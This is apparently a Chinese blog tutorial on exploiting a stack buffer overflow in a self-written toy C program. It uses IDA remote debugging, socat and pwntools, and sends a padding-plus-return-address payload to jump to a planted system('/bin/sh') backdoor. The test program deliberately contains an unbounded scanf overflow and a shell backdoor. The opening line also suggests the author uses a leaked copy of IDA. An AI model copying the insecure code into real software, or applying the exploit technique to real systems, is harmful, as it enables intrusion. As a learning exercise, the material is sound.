听说ida的全套工具一个不小心泄漏了,价值2万dollar,读书人最见不得这种赤裸裸地浪费,赶紧把二进制摆上日常了。
本地
首先找个c代码做为测试用例,必须是hello world:
#include <stdio.h>
void hello_world()
{
char buf[64] = {0};
scanf("%s", &buf);
printf("Hello %s\n", &buf);
}
// 方便测试,留个后门函数
void back_door()
{
system("/bin/sh");
}
void main()
{
hello_world();
}
将上面代码命名为test.c,然后使用gcc编译:
gcc test.c -o test
运行test:
然后把test程序拖到ida看看,按空格键切换反汇编窗口(列表视图&图形视图),然后给hello_world()函数搞个断点
接着使用IDA远程调试linux/mac/android下编译的程序,我的是mac,这里将mac_server64拷贝到mac的某个文件夹下
赋权并运行
到IDA中,选择 “Debugger” --> “Select debugger”;然后选”Remote mac os x debugger“,点击“OK”;
在IDA菜单中,选择“Debugger->Process options”,打开要调试的程序设置选项,在Application和Input file两项中输入ubuntu中要调试的程序,在Directory中输入要调试的程序所在的目录,在Hostname中输入linux机器的IP地址,端口保持默认即可,最后点击ok按钮:
注意,每次换网活着wifi,ip可能会不同。
按F9进入调试,会弹个框,点击yes,接着按F8进行单步调试,直到按到scanf函数。
其他调试相关快捷键:
1.F2下断点
2.F7进入函数,F8单步调试,F9跳到下一个断点,F2下断点,G调到函数地址
返回mac的控制台,输入一些字符A:
然后接着按F8,接着遇到printf会打印输出来
当然,我们不是来hello AAAAA的。从下图中我们可以看到,我们的AAAAA存储的开始位置为00007FFEEFBFF730,也就是buf的首地址,存储返回地址为0000000100000F39的地址为00007FFEEFBFF788,所以我们把这个地址里面的内容填充为恶意函数的地址。
我们计算一下我们需要填充地址的长度:
0x00007FFEEFBFF788 -0x00007FFEEFBFF730 = 0x58
远程
我一开始使用的环境是mac+虚拟机win10,发现有奇怪的问题:send数据接受不到,没解决,有大佬解决的告知一下;
所以接下来的环境变成了win10+虚拟机Ubuntu。
接下来就是进行远程调试,首先需要安装pwntools,这是一个很棒的EXP编写工具,安装如下:
python3 -m pip install pwntools
它的模块有很多:
- pwnlib.adb — Android Debug Bridge
- pwnlib.asm — Assembler functions
- pwnlib.encoders — Encoding Shellcode
- pwnlib.elf — ELF Executables and Libraries
- pwnlib.exception — Pwnlib exceptions
- pwnlib.flag — CTF Flag Management
- pwnlib.fmtstr — Format string bug exploitation tools
- pwnlib.gdb — Working with GDB
- pwnlib.log — Logging stuff
- pwnlib.protocols — Wire Protocols
- pwnlib.rop — Return Oriented Programming
- pwnlib.runner — Running Shellcode
- pwnlib.shellcraft — Shellcode generation
- pwnlib.shellcraft.<architecture>
- pwnlib.term — Terminal handling
- pwnlib.timeout — Timeout handling
- pwnlib.tubes — Talking to the World!
- pwnlib.tubes.<process|serialtube|SSH>
- pwnlib.update — Updating Pwntools
- pwnlib.useragents — A database of useragent strings
- pwnlib.util.cyclic — Generation of unique sequences
- pwnlib.util.fiddling — Utilities bit fiddling
- pwnlib.util.net — Networking interfaces
- pwnlib.util.packing — Packing and unpacking of strings
然后安装socat,Socat 是 Linux 下的一个多功能的网络工具,Socat 的主要特点就是在两个数据流之间建立通道,且支持众多协议和链接方式。如 IP、TCP、 UDP、IPv6、PIPE、EXEC、System、Open、Proxy、Openssl、Socket等。
brew install socat # mac
yum install -y socat # centos
apt-get install -y socat # ubuntu
socat基本用法:
socat [options] <address> <address>
其中这 2 个 address 就是关键了,address 类似于一个文件描述符,Socat 所做的工作就是在 2 个 address 指定的描述符间建立一个 pipe 用于发送和接收数据。几个常用的 address 描述方式如下:
-,STDIN,STDOUT :表示标准输入输出,可以就用一个横杠代替,这个就不用多说了吧….
/var/log/syslog : 也可以是任意路径,如果是相对路径要使用./,打开一个文件作为数据流。
TCP:: : 建立一个TCP连接作为数据流,TCP也可以替换为UDP
TCP-LISTEN: : 建立TCP监听端口,TCP也可以替换为UDP
EXEC: : 执行一个程序作为数据流。
以上规则中前面的 TCP 等都可以小写,在这些描述后可以附加一些选项,用逗号隔开。如 fork,reuseaddr,stdin,stdout,ctty 等。
在与test_5wimming同目录的终端输入命令:
socat tcp-listen:18888,reuseaddr,fork EXEC:./test_5wimming,pty,raw,echo=0
然后使用pwntools进行链接:
>>> from pwn import *
>>> io = remote('192.168.31.151',18888)
然后回到ida,需要在scanf后面下断点,因为此时程序已经执行了,等待输入:
接着,选择Debugger --> Attach to process.选择刚才用socat运行的程序,然后ok:
如果提示:
The debugger could not attach to the selected process.This can perhaps indicate the process was just terminated, or that you don’t have the necessary privileges.
那就是权限不够,使用命令:
sudo ./linux_server64 //或者关闭linux防火墙
接着按F9,让程序跑起来,按完之后ida显示running
回到python终端,发送我们输入的数据:
payload = b'A'*0x58 + p64(0x0000560EFFB96808)
io.send(payload) // io.sendline(payload)
io.send('\n')
io.interactive() // 交互
回到ida,查看栈信息,发现返回地址已经改成了我们的后门函数地址:
这时候报错:7F7934ED4E97: got SIGABRT signal (Abort) (exc.code 6, tid 3111)
不想调了,结果已经差不多了,有机会再试吧,哪位大佬有碰到相同情况的还请告知下。
参考:
https://blog.csdn.net/qq_17204441/article/details/89324620
https://xz.aliyun.com/t/3944
扫一扫
1365
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
